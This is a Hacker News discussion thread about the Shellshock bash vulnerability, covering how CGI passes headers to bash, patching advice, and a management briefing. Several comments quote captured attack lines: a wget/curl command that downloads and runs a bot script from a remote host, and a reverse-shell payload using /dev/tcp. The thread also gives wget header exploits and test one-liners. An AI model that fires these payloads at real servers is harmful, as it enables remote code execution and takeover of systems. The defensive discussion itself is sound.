I must not be understanding how this works then - how would /bin/bash be executed from a PHP system() call unless it was called directly from the command? And if you don't allow user input into the system call, how is /bin/bash going to be inserted into it? Thanks!

system() calls /bin/sh for you. If /bin/sh is linked to /bin/bash (a common thing), then it's exploitable.

Under the hood, system("echo foo") does a fork, and in the child process does execv(["/bin/sh", "-c", "echo", "foo"], env...)

Yeah I get that - but surely just _calling_ /bin/bash isn't enough - you have to be able to pass in the arguments to bash that enable this exploit. And if you're not allowing user input into your system call, I still think this is a non issue in this scenario.

If php is being run from mod_cgi, then it is exploitable.

The full chain of the attack:

Request sent to the url, containing headers with '() { :;}; codehere'

Per CGI standard: environment variables are set with the attack code.

PHP is executed directly, with the environment containing the attack.

PHP calls system - the same environment is there, meaning the code is executed if /bin/sh points to bash.

N.B. - If /bin/sh is not bash, but the program executed by system() itself executes a call to system() which points to something explicitly calling a bash ( apply this if recursively), the exploit is triggered.

It's not about passing "arguments" on the command line, its about what the environment variables are. It's not always immediately obvious how the env vars are constructed - everyone points to CGI because it's a well known scenario, but there are plenty of other cases where environment variables are set from user data.

tl; dr - in any situation user input is used in environment variables, simply calling /bin/bash is enough.

Correct - if you are using PHP as a CGI. This does not affect mod_php.

And this of course is a non-issue:



Yeah - that would not be an issue for mod_php since it is about DHCP - if you're server gets it's IP from DHCP, then there's a potential issue, but since we're talking about mod_php here (not running PHP as a CGI, just mod_php) then the linked post is not related.

mod_php is just as vulnerable as running php cgi scripts.

It seems like the pathway must be

exploiter -> machine -> conduit (in this case, a web server) -> bash command through scripting language

but that doesn't really make sense to me. if it's in the header as a cookie header, in php that would require something like this:

$someVar = $_COOKIE['somecookiekey']; exec($someVar);

this is a super fringe case, and wouldn't warrant this big of a deal. for this to be a 10/10 issue, it has to mean that processing the header files in Nginx/Apache results in some buffer overflow or for those values to be directly fed to bash.

otherwise the risk is super minimal, so I don't think it's a matter of making system/exec calls on user-supplied data.

No, you fundamentally and dangerously misunderstand the bug.

Your "exec($SomeVar)" example is a standard, unsanitized-input-passed-to-command-line type bug.

Shellshock does something fundamentally different. Everything on the actual command line is irrelevant to shellshock.

What happens is that the child Bash inherits env vars from the parent (which is often the web server). The shellshock bug is that the ENV VARS THEMSELVES are evaluated by bash as instructions.

Your actual PHP or whatever can be fully up to best-practices, sanitizing cookies and inputs, etc., and still fall vulnerable if one of the server-set environment variables like HTTP_ACCEPT_LANGUAGE has a malicious payload and ANYWHERE in your code, a subsequent system() call deep within some imported module gets fired off.

I'm sorry, my lack of understanding it was supposed to be apparent in that post, and indeed you clarified that it's actually more the second scenario I hinted at. I was responding to people talking specifically about an underlying language making system calls and that not making said system calls from the language itself would keep you safe.

You're confirming the suspicion that I had. To wit:

"for this to be a 10/10 issue, it has to mean that processing the header files in Nginx/Apache results in some buffer overflow or for those values to be directly fed to bash."

Not a buffer overflow, but if those headers are being fed upwards into bash, that's what we're both talking about.

in what way?

It's really not.

Don't forget to update any Docker instances of OS's. My brother just challenged me and I'd assumed my Docker Ubuntu instances would be updated automatically by updating the main Ubuntu OS but that was not the case. In my defense I'm still new to Docker.

I also used this to list my containers:

  docker ps -la -n=100
And removed them all, then listed images:

  docker images
And removed them and then ran this to get the latest ubuntu installed from docker:

  docker run -i -t ubuntu /bin/bash
Then when inside the container ran:

  env X="() { :;} ; echo busted" `which bash` -c "echo completed"
The new docker image of ubuntu is still vulnerable.

Edit: Updating the container then committing it (Docker terminology) should ensure that container stays updated, though any new runs creating new containers would continue to be vulnerable I suspect until Docker patches them or whomever would be responsible to do so.

Does anybody has steps what to do really as a sysadmin? Do I only need to install newest bash (on Linux systems) or do I also need to restart daemons like nginx/apache etc. ?

The vulnerability only affects bash when it is parsing environment variables, when it is just starting. So if a process is already running, it's not vulnerable and you don't have to restart it. You should definitely apply the patch from Wednesday, but be aware there is a related vulnerability that has no patch yet.

Add the configuration from this page https://access.redhat.com/solutions/1207723 to your Apache or nginx config to deny malicious HTTP requests.

This isn't always true. Frequently sub-shells are started without people really knowing, like with backticks or parenthesis.

But the sub-shell that gets started will use the new binary, which will be safe.

The only suitable logo for this vulnerability: http://img3.wikia.nocookie.net/__cb20080920183129/nintendo/e...

I wonder which will cause a greater net suffering to mankind?

Is there a (low volume) mailing list that would have alerted me to both this and Heartbleed?

Your OS vendors security list.

Well, I mostly use Debian and Arch:

Debian isn't low volume: https://lists.debian.org/debian-security-announce/2014/threa...

Arch isn't high volume enough(!) https://mailman.archlinux.org/pipermail/arch-security/

Arch recommends the oss-security list, which is all too high volume http://www.openwall.com/lists/oss-security/2014/09/

I guess you want to filter eg the Debian list by the packages you have installed ideally. An API to the same info would be nice.

Or filter the NVD feeds from http://nvd.nist.gov/download.cfm ?

For Debian that would be debian-security-announce [1], I try to read every post from that list.

1: https://lists.debian.org/debian-security-announce/

In another thread, I saw that this was an easy check to see if your bash was affected:

     env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
If you get "busted" back, then you're affected...which is what I get with Mac OS X 10.9...however, when I try it on an Ubuntu server (14.x) that hasn't been patched in awhile...I don't get the error...Er, why is that? I thought this pretty much affected every bash since 25 years ago?

(Someone else in this thread mentioned that Ubuntu uses dash...so...all modern Ubuntu servers are OK?)

No, you are not OK. Replace "sh" in that command with "bash" and you should still see the issue.

There is a lower likelihood that you'll see the issue, as anything which just uses sh (including the "system" function, and similar ones) will use dash indeed of Bash; but there will still be places where bash is called explicitly, including many shell scripts that depend on bash features, which are vulnerable.

Debian-based systems use dash instead of bash for /bin/sh. But if you have scripts that explicitly use bash, you are still at risk.

I tried this and it didn't work on my Ubuntu machine, it echoed "stuff". env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"

But then I tried this command and it echoed "vulnerable". env var='() { ignore this;}; echo vulnerable' bash -c /bin/true

AFAIK bash is the default terminal shell in all Ubuntus. So yeah, you're affected.

The attack isn't against terminal shells. The biggest risk is against things that use the shell implicitly like system()/popen()/etc and they all use /bin/sh

It's certainly possible to be at risk if, for instance, you had a CGI script that was specifically written in bash (i.e. starts with "#!/bin/bash") but that's a lot less likely.

So definitely patch your Debian/Ubuntu/etc machines but do your Redhat-based ones (and other places where "/bin/sh --version" indicates that it's bash) first.

It seems arbitrarily risky to say, effectively, "My bash is vulnerable, but it's OK because it's unlikely to be called due to the defaults being Something Else" -- that might be short-term reassurance, but it sure sounds safer to fix it even if you don't think it can be exploited.

By default I mean that new users are given bash as sh by default, including the users for daemon services. So unless you assigned a different shell, or the service specifically asked for a shell other than the default linked by /bin/sh, then they will be running bash.

I see how Apache passes request information through environment variables but I don't see how bash comes into play in typical CGI.

Is anyone up for educating me?

I see http request -> apache -> env variables -> php

What am I missing?

When you use any functions in PHP to spawn another process (with the exception of pcntl_fork), PHP will execute a shell to run your process. That shell is then inheriting the parent environment.

If you (or any libraries you use) do not shell out or if you're using php_fpm (which clears the env and passes headers out of the environment), the. You are safe.

I think I have the same question.. why is this called a "bash" bug? Is it not a webserver bug? Why does the webserver send data to bash through environment variables? Is there no better way to do it?

CGI is an interface first defined 1993, 21 years ago. No one thought setting user data in environment variables was a risky thing at the time.

More modern interfaces between dynamic code and webservers, like even FastCGI or SCGI or dozens of others do not pass user data over Environment variables, and instead pass data in various protocols over a socket.

It's a bash bug because the bug is ultimately in how bash parses environment variables. My understanding is quite limited, but IIUC, after the invalid function definition, the bash parser simply stops trying to parse the environment, and the remaining input tokens get used as arguments to the next command executed by the shell.

That's how Unix works. Subprocesses by default inherit the parents environment. And the http headers end up there because the CGI spec says so

Wow, thanks for the downvotes, everyone!

I wonder how that is justified, since my question generated 10 informative replies, five levels deep.

Does anyone dare to tell me why they downvoted my comment?

You are correct, you asked an innocent and to-the-point question.

If something, it's a bug in the CGI specification, since passing HTTP headers as environment variables is part of the standard.

Sort of I guess, but why does bash need to loop over all of the env variables and execute them? I don't think CGI had any reason to think that would ever happen?

(I guess that's basically what it's doing?)

Bash is a shell, part of it's purpose is to deal with enviroment variables. The bug here is that the parser is getting confused, the feature being abused here is being able to declare functions as part of an enviroment variable, which is used to transfer functions to subshells in bash. Now this itself is fine, but since the parser gets confused it also executes commands after the function definition.

Thanks. So why isn't even being able to declare functions risky? could an attacker overwrite built in functions?

They could, you can try for yourself:

    git='() { echo hello; }' bash -c git
but it's generally understood that attackers should not be able to provide enviroment variable names. If the attacker can do that, they can also provide an alternative LD_PRELOAD variable.

Though IMO, yes this is risky.

I honestly can't see why this is "fine"... I understand it's not the security critical bug, but feeding all environment variables into some sort of interpreter...?!?

Ok, bash needs to transfer function definitions to child processes in order to implement something called inherited functions, and I guess you could argue that an environment variable is a reasonable place to store them. But WHY THE HELL does bash have to use the function name as the variable name?!? That's just insane to me...

Any sane programmer would store that shit in an environment variable with a known name (e.g. "BASH_INHERITED_FUNCTIONS"). Why doesn't bash do that?!?

It appears they are talking about requiring prefixes for these vars (finally). Still, you look at the c code / macros that parse this shit and have to shake your head. This is what they mean by "attack surface". http://www.openwall.com/lists/oss-security/2014/09/25/13

Thank you God! :)

There's nothing wrong with putting arbitrary data inside an environment variable that other programs don't assign meaning to.

The issue is that bash takes it upon itself to parse all environment variables for functions, and accidentally executes some of them.

Folks, for what it's worth, here is a management briefing I wrote this morning. Please feel free to re-use, but please do give proper attribution. Please do comment and correct as appropriate.

Summary: Briefing for management on activities to minimize impacts of the "shellshock" computer vulnerability.

Status: Testing underway. Initial appraisals are that public-facing systems are likely not subject to shellshock. NOTE: The situation is fluid, due to the nature of the vulnerability. Personnel are also reaching out to hosting providers to assess the status of intervening systems.

What is it? A vulnerability in a command interpreter found on the vast majority of Linux and UNIX systems, including web servers, development machines, routers, firewalls, etc. The vulnerability could allow an anonymous attacker to execute arbitrary commands remotely, and to obtain the results of these commands via their browser. The security community has nicknamed the vulnerability "shellshock" since it affects computer command interpreters known as shells.

How does it work? Command interpreters, or "shells", are the computer components that allow users to type and execute computer commands. Anytime a user works in a terminal window, they are using a command interpreter - think of the DOS command prompt. Some GUI applications, especially administrative applications, are in fact just graphical interfaces to command interpreters. The most common command interpreter on Linux and UNIX is known as the "bash shell". Within the last several days, security researchers discovered that a serious vulnerability has been present in the vast majority of instances of bash for the last twenty years. This vulnerability allows an attacker with access to a bash shell to execute arbitrary commands. Because many web servers use system command interpreters to fulfill user requests, attackers need not have physical access to a system: The ability to issue web requests, using their browser or commonly-available command line tools, may be enough.

How bad could it be? Very, very bad. The vulnerability may exist on the vast majority of Linux and UNIX systems shipped over the last 20 years, including web servers, development machines, routers, firewalls, other network appliances, printers, Mac OSX computers, Android phones, and possibly iPhones (note: It has yet to be established that smartphones are affected, but given that Android and iOS are variants of Linus and UNIX, respectively, it would be premature to exclude them). Furthermore, many such systems have web-based administrative interfaces: While many of these machines do not provide a "web server" in the sense of a server providing content of interest to the casual or "normal" user, many do provide web-based interfaces for diagnotics and administration. Any such system that provides dynamic content using system utilities may be vulnerable.

What is the primary risk? There are two, data loss and system modification. By allowing an attacker to execute arbitrary commands, the shellshock vulnerability may allow the attacker to both obtain data from a system and to make changes to system configuration. There is also a third risk, that of using affected systems to launch attacks against other systems, so-called "reflector" attacks: The arbitrary command specified by the attacker could be to direct a network utility against a third machine.

How easy is it to detect the vulnerability? Surprising easily: A single command executed using ubiquitous system tools will reveal whether any particular web device or web server is vulnerable.

What are we doing? Technical personnel are using these commands to test all web servers and other devices we manage and are working with hosting providers to ensure that all devices upon which we depend have been tested. When devices are determined to be vulnerable, a determination is made whether they should be left alone (e.g., if they are not public facing and patches are either not yet available or would be disruptive at this time, or if there are other mitigations or safeguards in place), patched (e.g., if patches are available and are low impact), or turned off (e.g., if patches are not available, risk is high, and the service is not mandate critical).

Updates to this briefing will provided as the situation develops.

> Initial appraisals are that public-facing systems are likely not subject to shellshock.

All the managers I know will stop reading after this, sit back and think "aaah, those silly techies. Worrying about nothing".

I gave exactly the opposite advice: We should assume every public and non-public facing system is vulnerable (many were). I'd rather cause a big stinky scare and be proven wrong than downplaying the issue and being proven wrong.. the hard way.

You probably had a good reason for saying this to your organisation, but it's not something that other people should blindly re-use for their own purposes.

Yes, I did have a good reason: Our initial tests indicate that the organization is not vulnerable.

To be fair to you and to me, I can understand your take on what I posted but what I posted was redacted to remove organization-identifying information. A better redaction would perhaps have been Our initial scans and appraisals are that our public-facing systems are likely not subject to shellshock.

> Android and iOS are variants of Linus

... which is, in turn, a variant of Richard.

iOS systems are not vulnerable unless jailbroken. There are no shells, let alone bash, present in the iOS system.

Good to know, thanks!

Android and iOS are variants of Linus

What kind of variants? Doppelgänger? Clones? SCNR

Oops. Now that's funny. I had to reread several times to grok your comment. Now that I do, I am having a good laugh. I'll edit the post shortly.

EDIT: Or not - the edit button has gone. Ah well.

For any companies that handle customer data, especially PII or credit card information, even having the data access could be actionable and result in massive costs/fines.

This would be a major risk, IMHO.

Is there a way of preventing functions from being imported from the environment, but still allowing some variables in?

My experiments with

#!/usr/bin/env -i sh


#!/usr/bin/env - sh

...have not obtained what I'm after.

The problem being that functions take precedence over names in the file system, so

    bash-4.2$ env '/bin/cp=() { echo oops;}' /bin/sh -c '/bin/cp /tmp/foo /tmp/bar'

If an attacker can fully control the name of an injected environment variable, then you've lost already. The attacker can override LD_PRELOAD, which is an environment variable honored by the Linux kernel itself.

LD_PRELOAD is not honored for setuid executables, but you're right, we don't want to go there.

On Linux dhclient-script is written in bash. If it is vulnerable, then connecting to open wifi can be exploitable via rogue DHCP server.

Keep an eye on the patches directory for whatever version you use:


Just had to manually patch a CentOS4 legacy system.

What I find interesting is the patch has been around since the 16th, what took so long and what finally lit a fire under the mainstream *nix releases?

>CentOS4 legacy system

Jesus. That's been out of support for well over 2 years. I can't imagine this is the only problem it has. I'm curious: what's keeping the organization from upgrading it?

Heh, you should see some of the systems that orgs I work with still have running. Just checked on one of my favorites:

  $ uptime
   07:26:20 up 3280 days, 16:23,  2 users,  load average: 0.00, 0.00, 0.00
  $ cat /etc/issue
  Debian GNU/Linux 3.1 \n \l
This one doesn't even have the excuse of running a piece of lab equipment (I saw such a system recently running Win95 without OSR1, so it doesn't even have USB support. They move data around with ZIP disks!).

Attached via the 25-pin parallel port, no doubt?

I've got to maintain a couple of RHEL4 servers that have simulation software running on them that has never been ported forward (education - the people who wrote it have long since left). Though we also still have a couple of DEC Alpha's kicking about attached to nanofabrication services. Fun times... Luckily I don't need to maintain all the win98 boxes we still have as well. Or the DOS ones.

Variety is the spice of life, and all that...

Well it was immune to heartbleed, lol

(ancient openssl never had tls heartbeat feature)

But Redhat actually still supports EL4 through their ELS program and releases patches for it until March 31, 2017


CentOS simply decided not to keep up with it anymore, cannot blame them.

Usually time and money.

That or it does something ridiculously specific with a rare feature that was removed and the people who built it have left.

You find a lot of that type in education/local government.

I saw a couple of these hurled against my simple site:

    "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"

You can tail your access.log and grep the expression "\(?\s_\s\)?\s{|cgi" to get an idea if someone is trying to exploit your webserver. The cgi part will return a lot of false positives, but if you cannot disable cgi, you might as well track it being requested.

That will only find either clumsy exploit attempts or whitehat scans that are not trying to hide themselves.

CGI sends most headers through to the script as environment variables (i.e. a Foobar: header will turn into $HTTP_FOOBAR) so at attacker can just pick a header name that isn't likely to be logged.

Had anyone suggested and/or implemented something like building a tiny wrapper for bash that would clean environment and then execve("/bin/bash.vulnerable", argv, cleaned_envp)?

In the red hat links (already in the comments here) there is an LD_PRELOAD file which cleans the environment for _all_ your processes.

    $ /usr/bin/env - /usr/local/bin/bash -c set sh

Can anyone explain what I should do on OSX?

I've heard that replacing /bin/bash with a newer version of bash from homebrew or even zsh will work but is that going to break anything that assumes 3.2 bash??

You can apply the patch to the OS X version of 3.2: http://apple.stackexchange.com/questions/146849/how-do-i-rec...

I've been running upgraded bash - and more recently, just zsh, in OSX for years. It has never broken anything here.

I think the risk of breaking something is outweighed by the risk of exploit.

have you pointed /bin/sh and /bin/bash at it?

Are you running an HTTP or SSH server that faces the public? If so you need to update or take mitigation steps ASAP. If not you can wait until apple patches.

I'm reluctant to add to uncertainty, but I'm not sure these are the only concerns. Many Linux systems execute shell scripts via bash after acquiring a DCHP address, and would be vulnerable if someone took over the DHCP servers in, say, a co-working space, cafe or airport and maliciously configured them. I'm not 100% sure if Mac OS X (or iOS) use shell scripts for post-assignment configuration. The short answer is to be careful about wireless access you don't control until Apple issues a patch.

Wait, what? I know DHCP clients have had exploits but those were of the more mundane buffer overflows/range checking type; there are DHCP clients implemented in bash? Something doesn't seem right about that - AFAIK DHCP data like IPs and so forth are binary, not text.

Edit: just saw https://news.ycombinator.com/item?id=8367086 - may look into that a little more.

I've seen a lot of talk regarding the impact on embedded devices, but how many of these actually run GNU Bash? I can't think of many embedded devices that don't use Busybox instead.

>I can't think of many embedded devices that don't use Busybox instead.

What about all these shitty wireless routers out there? I think in the past they were QNX-based but they've long moved to being linux based. We know popular projects like dd-wrt and pfsense are probably okay (ash instead of bash), but what about the thousands of others? My own router is supplied by AT&T for its u-verse service. God knows what its running. Or all the NAS devices out there and load balancers, etc.

I guess we'll find out when the whitehats are done scanning the entire internet for vulnerable hosts.

I have a higher-end (albeit still consumer-level) ASUS wireless router that uses Busybox. I can't imagine that cheaper, lower-end models would be using full GNU bash instead.

I've only seen 2 requests in my logs:

access.log: - - [25/Sep/2014:06:28:08 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 447 "-" "() { :;}; /bin/ping -c 1"

access.log: - - [26/Sep/2014:13:38:10 +0000] "GET / HTTP/1.0" 200 473 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'"

With only static content (all logic implemented via cron).

    $ grep nginx /etc/passwd

    nginx:x:105:111:nginx user,,,:/nonexistent:/bin/false
And the only other service listening in this machine is SSH, but it's limited by iptables only to my home IP.

I think I'm safe. Now installing updates patches bash.

Anyway, I've seen that syntax before (I'm talking of years here), on #bash in freenode.

Simply nobody did apply this from a security view point in the channel...

When comparing security warning from RedHat https://access.redhat.com/solutions/1207723 vs Ubuntu http://www.ubuntu.com/usn/usn-2362-1/ the RedHat one wants you to run /sbin/ldconfig or reboot your machine. Why Ubuntu does not recommend this? They do ldconfig automatically?

The vulnerability only exists during the startup of a bash process. Updating bash is enough. Bash processes that are already running are past the point where they could be exploited. Future calls to bash will get the updated version. No services need to be restarted to apply the fix.

Pretty sure it's run as a one-shot boot service on almost all distros.

Has anyone constructed this exploit as a simple `wget` command?

wget --header='Referer: () { :;}; touch /tmp/vulnerable ' www.example.com

Note that you'll typically want to supply the URL to a CGI script on the site, not just www.example.com. Don't think you're unaffected just because the top-level page of your site doesn't appear vulnerable.

Is there some easy way of detecting a site you don't control is vulnerable without bringing it down?

Yes, you can ask it to ping an address you control and record where the pings come from.

Either of these will typically show you your running terminal:

ps -p $$

echo $0 (command name that was used to invoke the shell)

Not reliable: echo $SHELL (preferred shell for the user, not necessarily what is running)

Also note that you may want to remove/fix bash to make sure it doesn't get run by something else. A CGI script may run it despite you changing your default shell to something else.

I bet Microsoft are enjoying the fact that it is Linux that seems to have all the security vulnerabilities these days!

On the one hand, if this had been in Windows, no one in the public would have been able to stumble across it, though you would expect them to be paying rooms full of engineers to make sure that's never necessary (and yet stuff happens.)

On the other hand, despite the premise of open source that 'many eyes make all bugs shallow', the amount of code in the wild and the complexity of it (and the diversity of implementation languages) has pretty much guaranteed that there's more code than possible coverage.

No one has to come up with clever marketing for Microsoft exploits because everyone expects there to be tons of them, given the level of complexity, and that Microsoft will push patches for them, because it affects their bottom line. Meanwhile, it seems in the open source world, you need PR campaigns to goad the community into due diligence.

Considering most exploits are found via fuzzing tools, I think your assumption is pretty far away from reality.

If people could casually look at code and see vulnerabilities, then we wouldn't have any.

Also: MS Shared Source initiative

But people can casually look at code and see vulnerabilities, any time they want.

Although your point about the methods of exploits changing the dynamic is valid.

>Also: MS Shared Source initiative

Fair point.

>But people can casually look at code and see vulnerabilities, any time they want.

They could, but they don't. Same way I can look at the sky and see an asteroid. Possible? Sure. Likely? Not without some pretty advanced tools or a hell of a lot of luck.

>But people can casually look at code and see vulnerabilities, any time they want.

I think you're dismissing the level of experience, smarts, and inter-disciplinary knowledge it takes to find a bug like this. More than likely, even those with all those skills and at the 1% of them can't just eyeball code and go, "Ah yes, here." They're instead writing a lot of little tools and seeing what they can break. Then they go back, see what broke, and work out if its possible to exploit that exception or crash condition.

These types of tools and methods work just as well with closed source. Attacking closed source seems very unfair to me in these scenarios.

Do you have any evidence that this was found by looking at the code, as opposed to stumbling across it in use?


> ...if this had been in Windows, no one in the public would have been able to stumble across it...

Kind of a broad statement there, isn't it?

By your logic - Where do zero day Windows vulnerabilities come from then? People outside of Microsoft have certainly reported security issues to Microsoft in the past.

I meant specifically in the source code but you're right.

Heh, yeah- those two major failures certainly overshadow the hundreds of issues Win has. :)

Can you name those hundreds of issues discovered on Windows stack for, say, 2014? I'm on IIS and I really want to know if I'm missing something.

MS had it's fair share of security flaws in the past but give them credit for their current state. You sound like people still talking about BSODs, while it's certainly a thing in the past.

I get BSODs all the time on Windows 8.1 because of my video card drivers.

Here is the list of security advisories for all Microsoft products and they even list some non-Microsoft products like Adobe Flash, etc:

- https://technet.microsoft.com/en-us/library/security/dn63193...

I don't know where to get the multitude of security advisories for Unix systems listed all in one spot, but here are some links for popular distros:

- https://www.debian.org/security/

- http://www.ubuntu.com/usn/

- https://access.redhat.com/security/updates/active/

- http://www.slackware.com/security/list.php?l=slackware-secur...

Anyone know where to go in order to get the Unix vulns all in one list?

I was under the impression that windows server is pretty stable/secure these days.

Do two hugely impactful nix-centric security bugs overshadow the hundreds of minor ones found in Microsoft products?

Yes, certainly.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact